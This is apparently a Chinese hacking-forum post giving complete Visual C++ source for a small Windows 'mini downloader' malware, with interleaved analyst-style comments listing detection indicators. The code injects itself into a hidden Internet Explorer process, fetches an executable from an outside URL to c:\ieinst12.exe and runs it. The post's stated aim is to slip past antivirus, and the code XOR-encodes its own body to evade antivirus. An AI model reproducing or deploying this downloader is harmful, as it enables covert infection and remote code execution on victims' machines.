增加代码xor解密功能,以逃过杀毒软件. 生成MiNI下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可. 参考delphi版本的下载者源代码,编出来有16K左右。压缩也有10K多, 于是写了VC的代码。按以下的设置,编译出来2K左右。 还可以可以再设置一下编译开关,以减小体积。 Ps:原代码中4处没有对\转义,以下代码编译通过; 编译出来16K,去掉4行注释,编译后3K(编译环境:Win2003+VC6.0)
/*
"mini_downloader" code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
// Analyst notes (what this listing shows, for detection and triage):
// - The linker entry point is overridden to decrpt() (/ENTRY:decrpt). The
//   download() routine is expected to be stored XOR-encoded in the binary and
//   is rewritten in place at runtime, so static scans of the file do not see
//   its final bytes; the self-patch (VirtualProtectEx on its own code range,
//   then writes into the image) is the observable behaviour.
// - ShellExecuteA, URLDownloadToFileA and CreateRemoteThread are resolved by
//   name with LoadLibrary/GetProcAddress rather than imported, so those API
//   name strings are the static indicators in an otherwise small import table.
// - Host indicators present on this page: a hidden IEXPLORE.EXE launch
//   (WinExec + SW_HIDE), OpenProcess(PROCESS_ALL_ACCESS) on that process,
//   VirtualAllocEx + WriteProcessMemory of this whole image into it, a remote
//   thread started at download(), and the drop path c:\ieinst12.exe.
// - The download and execution happen inside the browser process via the remote
//   thread, presumably to inherit whatever network trust the browser has;
//   process-injection telemetry on IEXPLORE.EXE is the behavioural signal.
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") // uncommenting these 4 lines yields a ~2K binary
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")       // decrpt() replaces the CRT entry point
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")    // fixed base; the image is copied to the same address in the target (see main)
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );   // ShellExecuteA, resolved at runtime from shell32.dll
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);           // URLDownloadToFileA, resolved at runtime from urlmon.dll
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); // CreateRemoteThread, resolved at runtime from kernel32.dll
HANDLE processhandle;            // handle to the target (browser) process, set in main()
DWORD pid;                       // target process id, set in main()
HINSTANCE hshell,hurlmon,hkernel; // module handles from LoadLibrary; never freed
// Downloader routine that is injected into the browser process and run there as
// a remote-thread start routine. Its bytes (from download up to decrpt) are the
// region that decrpt() copies, XOR-decodes and writes back, so it must be laid
// out contiguously before decrpt() and must fit in decrpt()'s 500-byte buffer.
// The thread parameter (Module, passed by main) is not read.
void download()
{
    hshell=LoadLibrary("Shell32.dll");
    hurlmon=LoadLibrary("urlmon.dll");
    (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
    // Fetch the payload to a fixed path and open it (5 == SW_SHOW).
    // The URL string is as it appears on the page, including the " ... " gap.
    DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, NULL);
    SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);
    // Runs in the injected process, so this terminates the browser, not the dropper.
    ExitProcess(0);
};
// Injector. Launches a hidden IE, locates its process by window class, copies
// this entire image into it at the same base address, and starts download()
// there as a remote thread. No return value is checked anywhere in this path.
void main()
{
    // 1. Build the IE path from the Windows drive and launch it hidden.
    char iename[MAX_PATH],iepath[MAX_PATH];
    ZeroMemory(iename,sizeof(iename));
    ZeroMemory(iepath,sizeof(iepath));
    GetWindowsDirectory(iepath,MAX_PATH);
    strncpy(iename,iepath,3);   // keeps only the drive prefix, e.g. "C:\"
    strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
    WinExec(iename,SW_HIDE);
    Sleep(500);                 // fixed wait for the IE window to appear
    // 2. Get the IE process handle via its top-level window class.
    HWND htemp;
    htemp=FindWindow("IEFrame",NULL);
    GetWindowThreadProcessId(htemp,&pid);
    processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    // 3. Allocate memory in the target.
    HMODULE Module;
    LPVOID NewModule;
    DWORD Size;
    LPDWORD lpimagesize;
    Module = GetModuleHandle(NULL);   // base address of this process image
    // Read SizeOfImage from this image's PE header:
    // [base+0x3c] is e_lfanew, and 0x50 past the NT headers is OptionalHeader.SizeOfImage.
    _asm {
        push eax;
        push ebx;
        mov ebx,Module;
        mov eax,[ebx+0x3c];
        lea eax,[ebx+eax+0x50];
        mov eax,[eax]
        mov lpimagesize,eax;
        pop ebx;
        pop eax;
    };
    Size=(DWORD)lpimagesize;
    // Request the same base address in the target so the copied image's
    // absolute addresses stay valid (hence the fixed /BASE above); RWX region.
    NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    // 4. Write the image and create the remote thread.
    WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);   // copy whole image
    LPTHREAD_START_ROUTINE entrypoint;
    // Take the address of download() as the thread start routine.
    __asm {
        push eax;
        lea eax,download;
        mov entrypoint,eax;
        pop eax
    }
    hkernel=LoadLibrary("KERNEL32.dll");
    (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
    MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL);   // create the remote thread and run it
    // 5. Close the handle.
    CloseHandle(processhandle);
    return;
} ;
// Decoder and real entry point (/ENTRY:decrpt). Saves the bytes of download()
// (length taken as decrpt - download, i.e. it relies on link order), then for
// each key 1..0xFF writes the saved bytes XOR key back over download()'s code
// and calls main() under __try; a faulting main() is swallowed and the next key
// is tried. Note that main() itself does not execute the decoded bytes locally
// (they run in the remote process), so as far as this listing shows main()
// returns normally and the `return` inside __try ends the loop on the first
// key (0x01). The 500-byte stack buffer is only safe if download() is shorter
// than that; there is no length check.
void decrpt()
{
    HANDLE myps;
    DWORD oldAttr;
    BYTE shellcode[500];
    ZeroMemory(shellcode,sizeof(shellcode));
    myps=GetCurrentProcess();
    // Make the page holding download() writable: self-modifying code in .text.
    ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
    // First copy the original (encoded) code into the local buffer.
    _asm {
        pushad;
        lea esi,download
        lea edi,shellcode;
        lea ecx,decrpt;
        sub ecx,esi;
        en1:
        lodsb;
        stosb;
        dec ecx;
        jne en1;
        popad;
    };
    // Decode and copy back, one candidate key per iteration.
    int i;
    for (i=1;i<=0xFF;i++)
    {
        _asm {
            pushad;
            lea esi,shellcode;
            lea edi,download;
            lea ecx,decrpt;
            sub ecx,edi;
            en2:
            lodsb;
            mov ebx,i;
            xor al,bl;
            stosb;
            dec ecx;
            jne en2;
            popad;
        };
        // Author's comment: this construct is meant to keep common anti-virus
        // software from flagging the file. What it actually does is swallow any
        // exception raised by main() and move on to the next key.
        __try
        {
            main();
            return;
        }
        __except(EXCEPTION_EXECUTE_HANDLER)
        {
        };
    }
    return;
};
|